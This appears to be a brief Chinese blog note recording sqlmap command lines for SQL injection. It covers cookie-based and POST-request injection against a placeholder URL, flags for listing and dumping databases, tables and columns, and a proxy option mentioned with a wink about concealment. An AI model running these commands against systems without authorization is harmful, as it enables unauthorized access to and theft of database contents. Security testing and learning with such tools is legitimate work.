关于sqlmap的使用
好记性不如烂笔头,记录一下。
带cookie的注入
1 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="cookie_value" --level 2
从Post请求包注入(-p表示对指定的参数做注入)
1 python sqlmap.py -r Post_request.txt -p "special"
另外当交互采用的是JSON形式的字符串时,对需要注入的参数在键值对字段前面加上#号。
另外增加几个常用操作符
1 --dbms mysql #使用mysql数据库 2 --dbs #罗列出数据库 3 -D test #选择使用test数据库,否则默认为当前数据库 4 --tables #罗列出数据库所有表 5 -T test #选择使用某个表 6 --columns #罗列出所有的字段名 7 -C #dump出指定的字段
8 --proxy="http://127.0.0.1:8087" #指定代理,你懂得- -
记录一下。